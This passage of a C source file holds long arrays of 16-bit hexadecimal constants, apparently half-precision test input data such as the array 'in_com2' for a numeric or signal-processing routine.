0x2c43, 0xb873, 0x2fba, 0xb5b4, 0x349f, 0x31e9, 0x3666, 0x3716, 0x3011, 0x330c, 0x3147, 0x2bcf, 0x2cf7, 0xa931, 0xa31a, 0xb4c4, 0x2b26, 0xb855, 0xa1ee, 0xaf16, 0x3825, 0x315f, 0xb281, 0xa6e4, 0xa84d, 0x34ec, 0x3522, 0xaf84, 0x3560, 0xb8e9, 0x358a, 0x347b, 0xad04, 0xa9c6, 0xb2f2, 0xb524, 0x30a0, 0xb42c, 0x3165, 0x3403, 0xa4b8, 0xacef, 0x2634, 0x37a6, 0x2c6f, 0xb9db, 0x2eb7, 0xa690, 0xa31c, 0xb45d, 0xaf86, 0x38b2, 0x38d1, 0xb2aa, 0x2d03, 0x31a1, 0x36b6, 0xb2af, 0xb00c, 0x3137, 0xb0c0, 0xafbd, 0xaa94, 0xb041, 0x2a76, 0xb8a7, 0xb65c, 0x2e43, 0x35c0, 0xb2e3, 0xb3cc, 0x20cb, 0x355b, 0x3915, 0xb3cd, 0x34ea, 0xbaec, 0x2c2c, 0x2fc6, 0x375b, 0xb71f, 0xb0bc, 0xb4c4, 0x30b5, 0xab34, 0xb403, 0xbc00, 0x331f, 0xb018, 0x2d44, 0x30ff, 0x36f7, 0x3496, 0xb006, 0x30dc, 0xb079, 0x2fd0, 0xb09c, 0x35ba, 0x289b, 0xb1b4, 0x3432, 0xae08, 0x2851, 0x111c, 0x299d, 0x3510, 0xb54f, 0xaf51, 0x2fd8, 0xb004, 0xae26, 0x2aa5, 0x3197, 0x3496, 0xadbe, 0xb4e6, 0xb416, 0xb5b3, 0xac99, 0xb3a7, 0x2cbb, 0x340a, 0xac78, 0x371e, 0xaa47, 0xaeeb, 0x313b, 0xaf51, 0x3004, 0x38ff, 0xb867, 0xb435, 0xa228, 0x32c5, 0xb4e8, 0x36e3, 0xb401, 0x255b, 0x3724, 0x2e68, 0xab5d, 0xb581, 0xb4ab, 0x2dd3, 0x3501, 0x2a8f, 0x2291, 0xb2a6, 0xaf63, 0x2dff, 0xb360, 0xb571, 0xadd0, 0xb3bd, 0xad5c, 0xb7a9, 0xb095, 0xad05, 0x257b, 0x3472, 0x3148, 0x2f54, 0x3376, 0xab27, 0xb63c, 0xb8d3, 0xb1cb, 0xb747, 0x320e, 0xb381, 0xac49, 0xb15f, 0x30b5, 0x30c4, 0x2e80, 0xb593, 0x29d8, 0xb81b, 0xaf0b, 0xb370, 0x2cc8, 0x32be, 0x30c3, 0x2ddf, 0x2924, 0xaec6, 0x2e81, 0xb04b, 0xb107, 0xb358, 0xb397, 0x373a, 0x35fa, 0x34ef, 0x3461, 0xb340, 0xa17f, 0xb807, 0x3459, 0x277a, 0x3104, 0xb352, 0xb5d0, 0xac83, 0xaea3, 0x3289, 0xaa85, 0x1f6b, 0x29a5, 0xb3dd, 0xaeaf, 0x3547, 0xafdd, 0x269b, 0x2469, 0x2eb1, 0x378c, 0xb5ed, 0xb290, 0xb4e7, 0x31b1, 0x2ef4, 0xb13b, 0x3637, 0x3896, 0xb30c, 0x3592, 0xb501, 0xb442, 0x2ea6, 0x3696, 0xa483, 0xa681, 0x3575, 0x2ef3, 0xb76b, 0x15ad, 0x36aa, 0x32cf, 0xb578, 0xb166, 0x318f, 0x2ee1, 0x99eb, 0x32b4, 0x359f, 0xb766, 0xad7f, 0xb110, 0x372f, 0x37aa, 0xb780, 0xacdb, 0xb79c, 0x2d61, 0x33dd, 0xb310, 0xab7b, 0x28ff, 0xa182, 0xad77, 0x34b2, 0xb8a2, 0x30c6, 0x36dc, 0xb4be, 0xb3ba, 0xb362, 0x3134, 0x32e4, 0xaec4, 0x3739, 0x39ec, 0xb5e4, 0xb50b, 0xab17, 0xb4c4, 0x3209, 0xaebf, 0xb5c1, 0xb6ff, 0xaef3, 0x315c, 0x3547, 0xb925, 0xa5c8, 0x380d, 0x2d9b, 0xb6f0, 0xb348, 0x362d, 0x2c03, 0x2db2, 0xaeea, 0xad65, 0x2b77, 0xae1a, 0xad87, 0x35ca, 0x35d5, 0xb00d, 0x3afc, 0xb364, 0xac48, 0xb48a, 0x32e7, 0x1b0d, 0xb759, 0x2c2c, 0x3985, 0xb02d, 0xb6bf, 0x1fa3, 0xb740, 0x3286, 0xaaa8, 0xabda, 0xb8d7, 0x3555, 0x32ea, 0xb859, 0xaf1d, 0x2cf0, 0x2dcb, 0xb1e4, 0xad09, 0x2335, 0xb254, 0xb88b, 0xa20c, 0x2e6e, 0xb98d, 0xb068, 0xb455, 0x334a, 0xb5c9, 0x31bd, 0xb426, 0x30b9, 0x34da, 0xb3e0, 0xb537, 0x35a5, 0x3231, 0xb89c, 0xb17a, 0x34b7, 0x25c8, 0xb45d, 0x319b, 0xb764, 0xb370, 0x2c14, 0x2e14, 0x348d, 0xb660, 0xb2fd, 0xb2dd, 0xb5cd, 0x287f, 0x2adc, 0xb196, 0xb5ba, 0x3034, 0xb417, 0x2cdf, 0xb4e8, 0x2d4b, 0x2e23, 0x354f, 0xa981, 0xaaf6, 0x3993, 0x2f8d, 0xb8e2, 0xb564, 0x35cd, 0x3657, 0xb1fe, 0x35ad, 0x33c2, 0x2da1, 0x36d9, 0x1cd9, 0x37cd, 0xaf71, 0x3505, 0x3448, 0xa0a8, 0xb406, 0x36ae, 0xaedf, 0x2def, 0xa8e3, 0x37bd, 0xb57b, 0x34ae, 0x2adc, 0x34e6, 0xae30, 0xb2ea, 0x31ea, 0xb42b, 0xb2f2, 0x38cd, 0x325f, 0x36c1, 0xb51d, 0x35ab, 0xb0bb, 0x9617, 0xb05e, 0x2abd, 0xb643, 0x3191, 0xb245, 0xb5b9, 0xb056, 0xb80c, 0x334f, 0xb049, 0xb357, 0x3481, 0xa6ec, 0x3871, 0x2d74, 0xae39, 0xb3d6, 0xb397, 0x2463, 0x3019, 0x34d9, 0x2bc8, 0x30a6, 0xb7ba, 0x347c, 0x310b, 0xb296, 0xb0bf, 0x380f, 0xae3e, 0xb4ed, 0xb8ca, 0x2f6d, 0x2f2c, 0x38de, 0x2c97, 0xadc4, 0xac0c, 0x32a9, 0xb490, 0x2a37, 0xac9a, 0x2c83, 0x3086, 0xb57e, 0x2953, 0xb402, 0xadf9, 0xb020, 0xb226, 0xb0b4, 0x2859, 0xb25f, 0xae91, 0x25de, 0x2c86, 0xb154, 0x3893, 0xa7f7, 0xa96d, 0xb039, 0x2efe, 0x3013, 0xaf8b, 0xaa13, 0x3370, 0xb4ed, 0xa988, 0x3309, 0x3616, 0xad5f, 0xb3bf, 0xb7e5, 0x2e19, 0xaff0, 0x33e5, 0xb626, 0x3008, 0xb268, 0xb458, 0x3484, 0x31e3, 0xb5c9, 0xb3cc, 0x2c0f, 0xb354, 0xacee, 0xb7ec, 0x3184, 0x32c0, 0x366b, 0xab20, 0xb01a, 0x2a09, 0xb1e3, 0xb1a6, 0x33f9, 0x338f, 0x3018, 0xa571, 0x3867, 0x366d, 0x23b8, 0x35dd, 0xb43b, 0x323f, 0x2870, 0x34b4, 0xb4e8, 0x3885, 0x2b3f, 0x2ea5, 0x3405, 0xb14f, 0x37ce, 0xb4e0, 0xade7, 0x2cca, 0x3375, 0x3515, 0x2cb6, 0xb5b2, 0xb6a0, 0xb1f1, 0x2942, 0xb495, 0xb43a, 0x39d7, 0xae0a, 0x3566, 0x275a, 0x3556, 0x325b, 0xb65f, 0x2a21, 0x3243, 0xb2bc, 0x333a, 0xa73b, 0x37bd, 0xaed9, 0x2702, 0x2ef3, 0x2b8c, 0x3742, 0x3136, 0xb2a9, 0xb560, 0xb42e, 0xb354, 0x2ec3, 0xb8e0, 0x3502, 0x3506, 0x27a7, 0xad10, 0x8d76, 0xa970, 0xb528, 0xb408, 0x2e32, 0x300c, 0xb0dc, 0x3378, 0xae2a, 0xb056, 0xb402, 0xac0a, 0x322b, 0xb10a, 0xb4c5, 0x35e5, 0xa965, 0xb4e9, 0x396e, 0x307d, 0x34a2, 0xaab5, 0xaf60, 0xae18, 0xae3a, 0x37c8, 0x2f71, 0x2c3e, 0x33ad, 0xb34e, 0x1c2f, 0x2c8c, 0xb153, 0x2d54, 0x34d2, 0x3306, 0xa955, 0x34b9, 0x376e, 0x3363, 0x2d23, 0x30dc, 0x9810, 0xb843, 0x332a, 0xae06, 0xb189, 0xb46e, 0xac32, 0x3649, 0xabe9, 0x35ba, 0xb4b8, 0xb1be, 0xb952, 0xb206, 0x9c4b, 0x29d0, 0xb527, 0xb45b, 0xb15e, 0x3022, 0xb44b, 0xb216, 0xb711, 0x3779, 0x21e6, 0xb759, 0x308b, 0xb01c, 0x303f, 0x32ec, 0x32a4, 0xa5a9, 0xb513, 0xa7a5, 0xb5c2, 0x2ddd, 0xb5c0, 0xb475, 0x9913, 0x263b, 0xb559, 0xafc2, 0x2ca4, 0x3350, 0x9f42, 0x3218, 0x2e8d, 0xb229, 0xb2ec, 0x276b, 0xaef0, 0xa079, 0x34ee, 0x398a, 0x356d, 0x3718, 0xa2f9, 0xace7, 0x3864, 0x2f34, 0xac3e, 0x379e, 0xa5c5, 0x351f, 0xb1fd, 0xafa9, 0x2d3c, 0xb39a, 0xb510, 0x2bb6, 0xb66e, 0xb043, 0x3131, 0x36bf, 0xb0cf, 0x340a, 0xb821, 0x33d0, 0x3027, 0xb846, 0xb7e0, 0xab49, 0x30f3, 0x352b, 0xb2cd, 0xb582, 0xb464, 0xb3f7, 0xad91, 0xb25f, 0xaa60, 0xb21d, 0x2fd8, 0x3460, 0x366c, 0xb7ee, 0xb663, 0xa9b2, 0x3092, 0xb867, 0x2a06, 0x3426, 0x31d5, 0x359a, 0xb5e1, 0x3004, 0x28f8, 0x28b0, 0xb781, 0xb7df, 0x34a9, 0xb607, 0x309e, 0xa6b3, 0xb8ea, 0x25a3, 0xb2bc, 0xa5d8, 0xb952, 0xb119, 0xb40a, 0xb2da, 0x3368, 0x32ba, 0xb400, 0xb540, 0x31b7, 0x34b9, 0xb124, 0x3788, 0x2c40, 0x302d, 0x3589, 0xadd9, 0xb1ca, 0xb4ec, 0xb393, 0x345c, 0x3116, 0x2b61, 0xaec0, 0x2ef2, 0xb463, 0x2f55, 0xac26, 0xb3ba, 0x331e, 0x2d40, 0x2987, 0x3591, 0xb11c, 0xb421, 0xb01b, 0x30a3, 0xb2e6, 0x3b40, 0x37f5, 0x2f56, 0xaed2, 0xb484, 0xb203, 0xa1b6, 0xb06c, 0xb293, 0xb86c, 0xb8fe, 0x387b, 0xb424, 0xb181, 0x3821, 0x312d, 0xaddd, 0x32fd, 0x2043, 0x3876, 0xa0a4, 0xb8b8, 0x3390, 0xa5e8, 0xa9c0, 0xb46c, 0xb774, 0x3875, 0x37db, 0xb6af, 0x3acb, 0x2b5c, 0xa344, 0x3344, 0x3423, 0x26d4, 0x398b, 0x2f4a, 0x11dd, 0xb3ba, 0x2ee7, 0x3422, 0xab24, 0x381b, 0xad3f, 0x3228, 0x359f, 0xac88, 0xb28e, 0x390d, 0xa8f0, 0x31c2, 0xa8e9, 0xb220, 0x2e7d, 0x31c1, 0xb2f0, 0xb0ca, 0xb273, 0xad33, 0xb142, 0x340e, 0x34ef, 0x315d, 0xb0d3, 0xb0b8, 0xb5da, 0x3053, 0x1840, 0x3637, 0x3407, 0x9e8a, 0x3321, 0x3045, 0xb01c, 0xb168, 0x2c0a, 0x340a, 0x33dc, 0x3209, 0xab14, 0xb17b, 0xb7a8, 0x32cd, 0x2557, 0xb1f5, 0xb505, 0xa965, 0xae53, 0xb522, 0xb617, 0xb09b, 0xb191, 0xad89, 0x97cb, 0x36d6, 0xadeb, 0xb758, 0xa7a5, 0x3a4e, 0xb1ff, 0xaede, 0x2de5, 0xb68e, 0xa601, 0x28a1, 0xb29a, 0x3083, 0x2a06, 0x3449, 0x2e7b, 0xad2f, 0xb589, 0xb2c6, 0x2bc6, 0x2c34, 0x9fd6, 0x377f, 0x2d35, 0x38ba, 0x30e3, 0xa87a, 0x3805, 0x308f, 0xa965, 0x2513, 0x387a, 0x357b, 0xae6a, 0x1fed, 0x2897, 0xb2f1, 0x30b0, 0x2c4d, 0xb297, 0xa65e, 0x3922, 0xb11c, 0xb103, 0x369e, 0x9df0, 0xb17d, 0x36a8, 0xb728, 0xaf55, 0xa909, 0xb6ca, 0xb0b8, 0xb29f, 0xabc4, 0xb024, 0xb38e, 0xb139, 0xb483, 0xb03f, 0xb4e6, 0x36c7, 0x34e9, 0x3105, 0x2e10, 0x2fc6, 0xb0b9, 0xb5eb, 0xb434, 0x1c6f, 0xa17e, 0xb3d8, 0xb447, 0xa94d, 0x3103, 0x3027, 0x30a2, 0x3000, 0xb5f4, 0xaa80, 0xb2cc, 0xb472, 0xac62, 0x2795, 0xba6b, 0x2c87, 0xb44c, 0xa9e4, 0xa7d7, 0x288d, 0xb6c0, 0x243e, 0x3926, 0xa6c5, 0xa12c, 0xb22f, 0xb43a, 0xb912, 0xa8fc, 0xa8a5, 0xa35e, 0xb2f2, 0xb5ea, 0xa775, 0xb4b8, 0x25cc, 0xb18e, 0xb3ea, 0x30f9, 0xb6de, 0xb532, 0x343a, 0x2f84, 0x33f1, 0xac93, 0xb572, 0x370b, 0x2d7d, 0x2252, 0x3545, 0xb767, 0x3645, 0x3275, 0x31f5, 0xb38e, 0x2120, 0xb2ef, 0x2ab5, 0xb40b, 0x2ebb, 0xab73, 0xb6cb, 0xb401, 0x3183, 0x3646, 0xb4d7, 0x33de, 0xb4d4, 0xb408, 0x1d61, 0xb55e, 0x3409, 0x2285, 0xb069, 0x2d1e, 0x33fb, 0xb33a, 0x3632, 0xb5a1, 0x3897, 0xb3f6, 0x35d4, 0xb26a, 0xb56d, 0x2e41, 0xb8b5, 0xb443, 0x2a8f, 0x2e46, 0xae40, 0xadbf, 0xaa52, 0x2d46, 0x3587, 0xb4e3, 0xb81f, 0xb2fb, 0xb2c3, 0x1dae, 0x2a32, 0xb5c3, 0x38c8, 0xb42e, 0x2a86, 0xb2a4, 0x3094, 0xacaf, 0x3344, 0x30ac, 0x2e96, 0xaa1b, 0x26de, 0xaefb, 0xa56f, 0xb0b0, 0xb501, 0x341f, 0xb389, 0x348a, 0xb653, 0xba19, 0x3795, 0x2c3f, 0x373c, 0x37fc, 0xb55f, 0x3138, 0x25bc, 0x2df4, 0x3577, 0xabdf, 0xae78, 0xb8e3, 0xb45c, 0xb91d, 0xb1bb, 0xb311, 0x3380, 0x288d, 0x3239, 0xb8aa, 0xb407, 0xb389, 0xaf75, 0xb1fa, 0xaec4, 0x9ecc, 0xb7de, 0x321d, 0x38c6, 0x3a1a, 0xb6fa, 0xb5ca, 0x3417, 0xb0d4, 0xb804, 0xb18b, 0x2969, 0xad1d, 0xb66c, 0x31f8, 0xb727, 0xa79a, 0xb0d9, 0xaed1, 0x374a, 0x3610, 0x2e41, 0xa55c, 0x3898, 0x3679, 0xaf81, 0xb885, 0x380a, 0xa4c5, 0x2e70, 0x354b, 0x2df0, 0x21c5, 0x3422, 0xaf1a, 0xa26a, 0xb1f4, 0xb3df, 0xb431, 0x342f, 0xb064, 0x31e3, 0xb838, 0x2ad3, 0xb10d, 0xb5c5, 0x37d7, 0x306f, 0x2692, 0x2833, 0xb554, 0xb886, 0xb2be, 0xb45e, 0xb217, 0x2c36, 0xb1d9, 0xb8a7, 0x28a7, 0x31f1, 0x313d, 0xb345, 0x32ab, 0xb346, 0x2fc2, 0x3633, 0xafcb, 0xaf1c, 0x307e, 0x304b, 0x3222, 0xa2e2, 0xb7a4, 0x329e, 0xb2e9, 0x312a, 0x1ce6, 0xb874, 0x323e, 0x356b, 0xb59e, 0xa5a9, 0x3115, 0xb907, 0xafd1, 0xb65e, 0x3874, 0x2b7f, 0xa28d, 0x2fec, 0xad3f, 0xb2c3, 0x32d3, 0x3413, 0x2b7f, 0x28ac, 0xb0c9, 0xb5b8, 0x2829, 0xb1c0, 0x31cf, 0xaee2, 0x34d8, 0x31b1, 0x3921, 0xac5c, 0xacb5, 0x2844, 0x3825, 0x32fa, 0xb70a, 0xb0d2, 0x331e, 0x3934, 0xb400, 0xb467, 0xb58b, 0x39b8, 0x3560, 0x3618, 0xb066, 0x2f1b, 0xa858, 0xa88b, 0xb57e, 0xb753, 0xb5a9, 0xb590, 0x33f5, 0xa83c, 0x2e81, 0x3463, 0xb6a2, 0xa00f, 0x2b22, 0x35ea, 0xb571, 0x2ef3, 0xa766, 0x2284, 0x2ba3, 0x3257, 0x25f4, 0xac68, 0xaed5, 0xabf8, 0xa23f, 0x3180, 0xaad1, 0xb687, 0x2d1e, 0xb095, 0x2c4d, 0xb3a5, 0x331e, 0x33e5, 0x3593, 0x3448, 0xb6b7, 0xb6d3, 0x1e81, 0x34b4, 0x1fb7, 0x39cc, 0xb82e, 0xb132, 0xb2c9, 0x3100, 0x2ec2, 0x2cf7, 0xb000, 0xb2fc, 0x300d, 0xa4b1, 0xb139, 0x2bc8, 0xb480, 0x34dc, 0xb89d, 0x3087, 0x32c0, 0x3759, 0x3087, 0x3766, 0x3289, 0xad84, 0x350d, 0x2a28, 0xb6a2, 0xb722, 0x34da, 0xb548, 0xad68, 0xb042, 0x2fdf, 0xb0d5, 0x9de1, 0xb2ce, 0xb68c, 0xb010, 0x2dc7, 0xb6f9, 0xb094, 0x31b2, 0x3481, 0x367e, 0x32ae, 0xb02a, 0x2cdc, 0xb811, 0x3559, 0x3619, 0xb143, 0x2d31, 0x380a, 0x30e1, 0xac98, 0xac53, 0x2e49, 0xb68d, 0xb810, 0xb456, 0xb141, 0xb4ea, 0x3568, 0xb245, 0x27e6, 0xaea4, 0xb41d, 0xaf5e, 0x3334, 0xb769, 0xb22f, 0x3131, 0x1d49, 0xadc6, 0x3470, 0xac43, 0xb210, 0x34aa, 0x34f9, 0x3472, 0x2f9c, 0xac18, 0x3363, 0xb624, 0x2cd6, 0xaa9c, 0x3411, 0xaf6a, 0x2659, 0xb66f, 0x28f8, 0x3599, 0x3076, 0xa7d7, 0xae8f, 0x2559, 0xb055, 0x34d2, 0x3729, 0xb441, 0x2565, 0x3080, 0x345a, 0xaf68, 0xb42e, 0x3787, 0xb22d, 0x341a, 0xb820, 0x2526, 0xa21d, 0xb179, 0xb647, 0x36a0, 0xb82e, 0x36e4, 0x2d9a, 0x3958, 0x3720, 0xb2c1, 0xb5f5, 0xb34b, 0x3220, 0xb346, 0x31fe, 0x2fa6, 0x3339, 0xab78 }; static const uint16_t in_com2[2209] = { 0xab37, 0x322e, 0xb1d5, 0x27b9, 0x35ab, 0xabe3, 0x2e76, 0xb622, 0x30f6, 0x35da, 0xa3a4, 0xa8ca, 0x1cb0, 0x26ba, 0xab15, 0x1cbd, 0xb3f3, 0x31f8, 0xb4c8, 0xb62b, 0xb36b, 0xb14c, 0x3528, 0x357e, 0x2eb9, 0x3566, 0x2c0e, 0xb638, 0x37e3, 0x2c43, 0x3133, 0xb5e3, 0x33e9, 0xb345, 0xb0b9, 0x9acd, 0xb639, 0x2d95, 0xb0c4, 0xb436, 0x2e30, 0xb4c5, 0xabdd, 0x33d7, 0xb5ee, 0x373b, 0x3615, 0x1e17, 0xb1d9, 0x3243, 0xb1ee, 0x34c4, 0x32c9, 0x3853, 0x2e13, 0x3334, 0x2e72, 0x3081, 0xad9d, 0x2e55, 0xb058, 0x3156, 0x2942, 0xac53, 0xb2df, 0x9fb1, 0xac6c, 0xaedb, 0x3520, 0x2898, 0xb2e3, 0x3770, 0x2d2f, 0xaa12, 0x2e1f, 0x348c, 0x25c0, 0xb31c, 0x3097, 0xabf9, 0xa849, 0x382b, 0xb824, 0x34f4, 0x3444, 0xb07a, 0xa413, 0xb677, 0x3356, 0xb0a9, 0xae10, 0xad60, 0x2051, 0xb3dd, 0x375d, 0x359b, 0x295a, 0x3084, 0x38ac, 0xac75, 0xae9a, 0xb122, 0x2e4b, 0xa06e, 0xb500, 0xb5c6, 0xb4b8, 0xb68d, 0x2c50, 0x3882, 0xb644, 0x2b9f, 0x32b7, 0xaec9, 0xb912, 0x2b57, 0x35d2, 0xb4e2, 0x3464, 0x34ab, 0x333c, 0x343d, 0xa56b, 0xb5bf, 0xb12e, 0xac24, 0xb80f, 0x3a5a, 0x3061, 0xb552, 0xb8b9, 0xb4a0, 0x3653, 0x2f1a, 0xb685, 0xae96, 0xab8e, 0x2e75, 0xae73, 0xb542, 0x36a9, 0x295b, 0x30cf, 0x3136, 0x2fe4, 0xb7a5, 0x3213, 0xb058, 0xb68c, 0xa791, 0xb534, 0x2a1c, 0x3586, 0xb88b, 0x2e49, 0xb006, 0xa73e, 0xac92, 0x3662, 0x3413, 0xa8b7, 0x387c, 0x9b2c, 0x379b, 0xb794, 0xb46f, 0xa42a, 0x36d5, 0x3867, 0x3798, 0xb694, 0xb3d3, 0xb87c, 0xb1e4, 0x3800, 0x31b7, 0xa4fd, 0xb24f, 0x347c, 0x2e09, 0x38a5, 0x3905, 0xb2ab, 0xb991, 0x3441, 0xaf46, 0xb180, 0xb605, 0xb20c, 0x2da2, 0x3964, 0x24a6, 0x353d, 0xb187, 0xae63, 0xab12, 0xb45c, 0x3042, 0x2df5, 0xb659, 0xaf0f, 0xb162, 0x2fa8, 0x2c3e, 0x38f9, 0x346c, 0x3457, 0x2d5c, 0xa470, 0x3563, 0x36d1, 0xb20e, 0x3244, 0x316e, 0x3711, 0xb11f, 0x2ed5, 0x3211, 0x34b3, 0x3589, 0x1f1b, 0xb1a7, 0xb711, 0xb7be, 0x2af7, 0x345a, 0xa65c, 0x2b4d, 0x31a8, 0xb4aa, 0xb806, 0xb465, 0xafe0, 0xb481, 0x330e, 0x34b7, 0x33d7, 0xb3be, 0xa612, 0x2bc9, 0x2e6a, 0xb091, 0x348c, 0x33a3, 0x273a, 0xb232, 0x381e, 0x3206, 0x328a, 0x30b3, 0xb317, 0x2c2e, 0xb4c7, 0x2cd9, 0x2cb3, 0x364c, 0x2716, 0xb62b, 0xb873, 0x353b, 0xb025, 0x324c, 0xb038, 0x35d5, 0x31da, 0xb1bd, 0x3636, 0x3497, 0x33a3, 0x24b7, 0x330e, 0xb247, 0x28aa, 0x34b3, 0x3a6a, 0xb757, 0x35a5, 0x27c8, 0x2bbe, 0xadf6, 0x3038, 0x340c, 0xb3c7, 0xb5bd, 0xaedf, 0x300b, 0x32fb, 0x3146, 0xa4af, 0x29c7, 0x3b3a, 0x2fc9, 0x3897, 0xb5d8, 0xb799, 0xb254, 0xb149, 0xacf8, 0x3826, 0x3168, 0x315d, 0x2c13, 0xb14a, 0xb098, 0x2c40, 0x30f8, 0x39a3, 0x3575, 0x3593, 0xb781, 0xb5b2, 0x31c3, 0xb00b, 0x32a2, 0xb259, 0xb698, 0xb8a6, 0x26e3, 0xa8f1, 0x36d8, 0xb306, 0x2c9c, 0x339d, 0x329a, 0xb3d9, 0xa506, 0x359d, 0x2292, 0x31fd, 0x3177, 0xaa35, 0x2538, 0xb6ee, 0x300d, 0x372c, 0xb08d, 0x3941, 0xb4dd, 0x2edb, 0xae4e, 0x35f5, 0x32be, 0xb7bf, 0x2cb5, 0x3555, 0x34bd, 0x34b0, 0xab00, 0xb6ab, 0xb087, 0xa8a1, 0x2845, 0x3596, 0x3885, 0x2ef4, 0x331b, 0x24e1, 0x37be, 0x345e, 0x3535, 0x352e, 0x3194, 0x35da, 0xb59c, 0x305a, 0xb0e3, 0xadc9, 0x2ac8, 0xad3e, 0x2ed6, 0x3804, 0xb4f0, 0x34ad, 0x2db7, 0xabf5, 0xb8e5, 0xb289, 0xb31d, 0xa9eb, 0xb303, 0x332c, 0x3259, 0x9e2e, 0x3080, 0xb0ce, 0xac95, 0xb050, 0xb059, 0x325c, 0x3827, 0xb3af, 0x2d45, 0xb0cd, 0xb408, 0xad8a, 0xb4fe, 0xaf20, 0x32a1, 0x24e3, 0xad32, 0xb0f6, 0x347f, 0xb4d2, 0x35fe, 0x382a, 0x2f11, 0xa840, 0x3678, 0xacec, 0x38af, 0x3538, 0xaf04, 0x3298, 0x3246, 0x2c22, 0xb2e9, 0xb343, 0x3123, 0x28ea, 0x327e, 0x2360, 0x35d2, 0xb35a, 0xb1ed, 0xb3c8, 0xb15f, 0x242a, 0x35d9, 0xb5b5, 0x362b, 0xb4ac, 0x3505, 0xb89b, 0xb9b1, 0xb41d, 0xb8ec, 0xae26, 0x34f9, 0x3645, 0x3743, 0xaca0, 0xb044, 0x1ae0, 0xb17c, 0x365b, 0xb57c, 0x30d1, 0x375c, 0x2597, 0xb4bc, 0xae4b, 0x2856, 0xb55e, 0x318e, 0xa9ad, 0xa7da, 0x313c, 0x3650, 0xb7ba, 0xb1f0, 0xa3ca, 0x2fbe, 0xb051, 0xb5f4, 0xaa9f, 0xb35d, 0x30ff, 0xaf8d, 0xb295, 0x2e41, 0xb4e7, 0x19c1, 0x2fb9, 0xaa97, 0xb929, 0xab44, 0xb7ce, 0x3618, 0x3663, 0x354d, 0xb79b, 0xb188, 0x2f9f, 0xae73, 0x35f5, 0xb264, 0xa8f0, 0x3829, 0x379d, 0xac71, 0x3758, 0x2f60, 0x343f, 0x338c, 0x3602, 0xb90d, 0x345f, 0x33a3, 0x349d, 0x213c, 0x2f7f, 0x32c3, 0xb899, 0xb07a, 0xb4e0, 0xae25, 0x3098, 0xaf6e, 0xb5ac, 0xb123, 0x375b, 0xa5b9, 0x3669, 0xa4ea, 0x2c4e, 0x35e3, 0x31ed, 0xa576, 0xb579, 0x33f3, 0x38df, 0x9b2b, 0x344e, 0xa9ec, 0xacef, 0xb75c, 0x3031, 0x3174, 0xb49d, 0x328c, 0xb5eb, 0xb343, 0xb159, 0xacd5, 0x3252, 0xb8de, 0x38de, 0xa0d3, 0x309b, 0x3239, 0xb4c2, 0x2ef4, 0x9953, 0x3406, 0x2ce2, 0x3461, 0xb175, 0x313e, 0xad33, 0xb1f4, 0xb400, 0xb316, 0xb592, 0xb7ab, 0xa6eb, 0x35a7, 0x34a2, 0x31ca, 0xa90a, 0x32e6, 0xb5a3, 0xafa3, 0x3429, 0xb45b, 0xb4a4, 0x2b4f, 0x24d0, 0xb43f, 0xb2ee, 0xac5c, 0x3406, 0xb60c, 0xa648, 0xaff1, 0x2631, 0x318e, 0xb7a4, 0xb16c, 0xa6e6, 0x2c31, 0xb358, 0x3281, 0xb4f6, 0xb3bf, 0xb0ee, 0xb4bf, 0x347b, 0x37c8, 0xb468, 0xa999, 0x3112, 0xb703, 0x34ec, 0x31dc, 0x35bb, 0xb2a3, 0x3706, 0x26b6, 0xb4d9, 0x2fec, 0xb5a4, 0x2e69, 0x34ae, 0xba2a, 0xb0d2, 0x33c9, 0xa9ff, 0x2af6, 0xb444, 0xb897, 0xa681, 0x22c9, 0xb0b7, 0x3253, 0xb67c, 0x2fd0, 0x30a5, 0x2830, 0xb32e, 0x205c, 0xb3dc, 0xb1b7, 0x35aa, 0xb152, 0x1429, 0xaca1, 0x2d29, 0x30bd, 0x31f0, 0x2ca7, 0xb6a1, 0xb028, 0x2eea, 0xaa96, 0xb699, 0xb77b, 0xb8e5, 0x33c1, 0xb89b, 0x2bf5, 0x2c80, 0x3192, 0x8a26, 0xac16, 0xb513, 0x34f4, 0x2e61, 0x31aa, 0x30a3, 0x3142, 0x373d, 0xb3aa, 0x2cc6, 0xb845, 0xb499, 0xb333, 0xb4ad, 0x2d42, 0xb41b, 0x3189, 0xb056, 0x3167, 0x37e8, 0xac1d, 0x331a, 0xb673, 0x3383, 0xb186, 0xb1b8, 0x24a6, 0xb2a9, 0x2217, 0xb667, 0xae7f, 0x38b1, 0x318f, 0x335c, 0xb5ba, 0xb4df, 0xb183, 0x250f, 0x351b, 0xae07, 0x39b9, 0x35da, 0xaab1, 0x34a4, 0xb560, 0xb138, 0x335e, 0x37a7, 0x2d6b, 0x326e, 0xb488, 0x35c3, 0x30c6, 0xb1f5, 0xac0e, 0x2aee, 0x284a, 0x31e5, 0x386c, 0x35e4, 0xa1a6, 0x37e6, 0xb0f3, 0xb939, 0xb637, 0x2728, 0xb3f7, 0xb009, 0xadb9, 0x2f22, 0x2455, 0xa356, 0xb84e, 0xae0e, 0x332a, 0x3467, 0xa3d0, 0xa7a6, 0x3043, 0x347a, 0xa6fa, 0xb974, 0x22e6, 0xb14e, 0x356f, 0x3612, 0xb79a, 0x1417, 0xb6db, 0xb520, 0x3145, 0x32c7, 0xb0aa, 0xaebe, 0x2f39, 0xafda, 0xacbd, 0xa4e1, 0x3243, 0xb813, 0xb788, 0x2a09, 0x2eb9, 0x3593, 0x34e3, 0xb7bb, 0xa4c6, 0x30e1, 0x1f7f, 0xb567, 0x322f, 0x2e8b, 0x1e59, 0x32ed, 0xb066, 0x2acb, 0xb705, 0x35aa, 0x29f5, 0x17a3, 0xac1d, 0xa098, 0xb36d, 0x2aa8, 0xa71d, 0xac90, 0x300a, 0xb8c2, 0x336b, 0x2ea9, 0xb0d9, 0x32cc, 0xb416, 0x3419, 0xb201, 0x9411, 0xaf10, 0x3180, 0x3565, 0x30a4, 0xab0b, 0xb9d3, 0xb368, 0xaae3, 0xac6b, 0xb5ae, 0x33fb, 0xb506, 0xb35b, 0x3493, 0x1eec, 0xb04b, 0x3591, 0x35f3, 0x3017, 0xb171, 0xad6d, 0x3144, 0x2579, 0xb4e5, 0xa864, 0x352a, 0xb291, 0xa218, 0x3776, 0xb580, 0xab07, 0xb099, 0x3871, 0x25a9, 0xb116, 0x36d2, 0x381c, 0xb4c6, 0x30f1, 0xb561, 0x3538, 0x2e32, 0xb2b6, 0xac5b, 0xb139, 0xb451, 0xae17, 0xb830, 0xade5, 0x2a5f, 0x2b36, 0xa2fd, 0x1985, 0x3543, 0x38dd, 0x9938, 0x2d82, 0x364f, 0x3117, 0xb239, 0x34c3, 0x310d, 0xb5c7, 0xadf7, 0x29d3, 